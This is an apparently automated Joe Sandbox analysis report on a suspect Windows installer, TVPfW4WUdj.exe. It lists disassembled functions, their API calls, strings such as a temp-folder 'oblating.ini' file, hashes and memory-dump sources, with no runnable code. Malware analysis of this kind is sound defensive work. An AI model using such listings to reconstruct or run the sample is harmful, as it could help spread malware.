                                                                • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                  • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                  • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                • wsprintfA.USER32 ref: 00405F4F
                                                                • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                  • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                  • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                • String ID: %ls=%ls$[Rename]
                                                                • API String ID: 2171350718-461813615
                                                                • Opcode ID: 9fe56ee9aebbe4e8a82578a5ab6143b45b94006cc37f6f31d23d913fa1877209
                                                                • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                • Opcode Fuzzy Hash: 9fe56ee9aebbe4e8a82578a5ab6143b45b94006cc37f6f31d23d913fa1877209
                                                                • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                Function 00406518 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$Prev
                                                                • String ID: "C:\Users\user\Desktop\TVPfW4WUdj.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 589700163-1487668618
                                                                • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                • GetSysColor.USER32(00000000), ref: 004042BD
                                                                • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                • GetSysColor.USER32(?), ref: 004042E8
                                                                • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                • DeleteObject.GDI32(?), ref: 00404312
                                                                • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                • String ID:
                                                                • API String ID: 2320649405-0
                                                                • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                  • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                • String ID: 9
                                                                • API String ID: 163830602-2366072709
                                                                • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                                                Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                • GetMessagePos.USER32 ref: 00404BD9
                                                                • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Message$Send$ClientScreen
                                                                • String ID: f
                                                                • API String ID: 41195575-1993550816
                                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                Function 00401DB9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDC.USER32(?), ref: 00401DBC
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                • String ID: Calibri
                                                                • API String ID: 3808545654-1409258342
                                                                • Opcode ID: 1acdf138dc74c3f4cbb002bee862ac271e9050b380170d6a443b5acebdec0054
                                                                • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                                • Opcode Fuzzy Hash: 1acdf138dc74c3f4cbb002bee862ac271e9050b380170d6a443b5acebdec0054
                                                                • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                • MulDiv.KERNEL32(000D1E95,00000064,000D1E99), ref: 00402E3C
                                                                • wsprintfW.USER32 ref: 00402E4C
                                                                • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                Strings
                                                                • verifying installer: %d%%, xrefs: 00402E46
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                • String ID: verifying installer: %d%%
                                                                • API String ID: 1451636040-82062127
                                                                • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                • GlobalFree.KERNEL32(?), ref: 00402956
                                                                • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                • String ID:
                                                                • API String ID: 2667972263-0
                                                                • Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                                • Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                                Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                • wsprintfW.USER32 ref: 00404B52
                                                                • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: ItemTextlstrlenwsprintf
                                                                • String ID: %u.%u%s%s$6B
                                                                • API String ID: 3540041739-3884863406
                                                                • Opcode ID: 45cae9be8c13eedb47404a8b3ee91442d476cfb775bff5969470e661b9022d33
                                                                • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                • Opcode Fuzzy Hash: 45cae9be8c13eedb47404a8b3ee91442d476cfb775bff5969470e661b9022d33
                                                                • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025E8
                                                                • lstrlenA.KERNEL32(nerveklinikkernes,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWidelstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini$nerveklinikkernes
                                                                • API String ID: 3109718747-2559318862
                                                                • Opcode ID: 6fe48562458a27e729fff662e17573b5408da1b41df62b44909c30a4cd300cf5
                                                                • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                                • Opcode Fuzzy Hash: 6fe48562458a27e729fff662e17573b5408da1b41df62b44909c30a4cd300cf5
                                                                • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                                Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                • GetLastError.KERNEL32 ref: 00405812
                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                • GetLastError.KERNEL32 ref: 00405831
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
